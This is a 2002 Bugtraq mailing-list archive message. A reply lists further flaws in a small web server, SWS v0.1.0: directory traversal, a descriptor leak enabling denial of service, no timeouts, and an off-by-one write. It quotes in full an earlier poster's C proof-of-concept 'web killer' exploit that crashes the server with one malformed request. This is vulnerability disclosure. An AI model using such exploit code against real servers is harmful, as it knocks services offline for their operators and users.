[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: SWS Web Server v0.1.0 Exploit
Dear saman@xxxxxxxx,
I don't believe this is largest problem of this "webserver"... There is
a lot of others:
1. Directory traversal (../) (it never drops root priveleges it needs to
bind to TCP/80).
2. It never closes file descriptor for 404 document, so it can be used to
DoS remote system completely by repeating request to nonexistent
document..
3. It allows only 1 connection in time and never timeouts.
4. If recv() fails it will overwrite 1 byte before allocated buffer and
repeat previous query. If first recv() fails it will try to do some
action on uninitialized heap data.
One should be completely nuts to use it because there's too many bugs
for 130 lines of code :)
--Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq@xxxxxxxxxxxxxxxxx:
shc> -----BEGIN PGP SIGNED MESSAGE-----
shc> Hash: SHA1
shc> /*
shc> * Mon Sep 2 17:45:04 2002
shc> *
shc> * |SaMaN| aka Mert <saman@xxxxxxxx>
shc> *
shc> * Information : Anyone can kill SWS Web Server v0.1.0 remotely.
shc> *
shc> * Proof of Concept Exploit for SWS Web Server v0.1.0
shc> *
shc> * SWS homepage : http://www.linuxprogramlama.com
shc> *
shc> * Tested on : Slackware 8.1 - 2.4.18
shc> * : Redhat 7.0 - 2.2.16-22
shc> *
shc> * Problem : sws_web_server.c
shc> * : line 108
shc> * : if (recvBuffer[i - 1] != '\n') break;
shc> *
shc> * Q : So what will happen when we send a string not end with '\n' ?
shc> * A : break break break
shc> * Q : So root should restart web server everytime ?
shc> * A : Yes
shc> * Q : Other web servers act like this ?
shc> * A : No
shc> * Q : So something is wrong ?
shc> * A : Yes :)
shc> *
shc> */
shc> #include <stdio.h>
shc> #include <stdlib.h>
shc> #include <unistd.h>
shc> #include <errno.h>
shc> #include <string.h>
shc> #include <netdb.h>
shc> #include <sys/types.h>
shc> #include <netinet/in.h>
shc> #include <sys/socket.h>
shc> #define K "\033[1;31m"
shc> #define Y "\033[1;32m"
shc> #define SA "\033[1;33m"
shc> #define M "\033[1;34m"
shc> #define PORT 80
shc> int main(int argc, char *argv[])
shc> {
shc> int sockfd, numbytes;
shc> struct hostent *adres;
shc> struct sockaddr_in hedef;
shc> char buf[8] = "|SaMaN|";
shc> if (argc != 2) {
shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc> printf("%sSWS Web Killer (saman@xxxxxxxx) \n", SA);
shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc> printf("%sUsage: ./sws_web_killer %s<IP> \n",Y,M);
shc> return 0;
shc> }
shc> if ((adres=gethostbyname(argv[1])) == NULL) {
shc> perror("gethostbyname");
shc> exit(1);
shc> }
shc> if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
shc> perror("socket");
shc> exit(1);
shc> }
shc> hedef.sin_family = AF_INET;
shc> hedef.sin_port = htons(PORT);
shc> hedef.sin_addr = *((struct in_addr *)adres->h_addr);
shc> memset(&(hedef.sin_zero), '\0', 8);
shc> if (connect(sockfd, (struct sockaddr *)&hedef,
shc> sizeof(struct sockaddr)) == -1)
shc> {
shc> perror("connect");
shc> exit(1);
shc> }
shc> if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
shc> perror("send");
shc> exit(1);
shc> }
shc> close(sockfd);
shc> return 0;
shc> }
shc> -----BEGIN PGP SIGNATURE-----
shc> Version: Hush 2.1
shc> Note: This signature can be verified at https://www.hushtools.com
shc> wlYEARECABYFAj1zqVwPHHNhbWFuQGh1c2guY29tAAoJEAH/SwbH8cXFjRIAniyG5sTp
shc> 9dPQOfCYbPdtlwHYawc8AKCSvQ23yBZszI97DmMt+maxaqgqOg==
shc> =tmWT
shc> -----END PGP SIGNATURE-----
shc> Get your free encrypted email at https://www.hushmail.com
--
~/ZARAZA
Таким образом этот путь дешевле и к нему легче добраться
тому, кто в состоянии до него добраться. (Твен)